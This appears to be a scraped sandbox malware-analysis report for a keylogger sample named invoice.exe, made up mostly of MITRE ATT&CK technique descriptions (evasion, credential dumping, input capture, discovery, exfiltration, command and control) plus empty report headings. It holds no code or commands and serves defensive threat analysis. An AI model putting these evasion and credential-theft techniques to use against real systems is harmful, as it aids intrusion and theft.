Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report invoice.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice.exe.log

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Windows Analysis Report
invoice.exe

Function 057DDB60 Relevance: 2.7, Strings: 2, Instructions: 190
COMMON

Function 057DDB70 Relevance: 2.7, Strings: 2, Instructions: 189
COMMON

Function 016FD868 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Function 016FD878 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 07EFDF47 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Function 07EFDF50 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre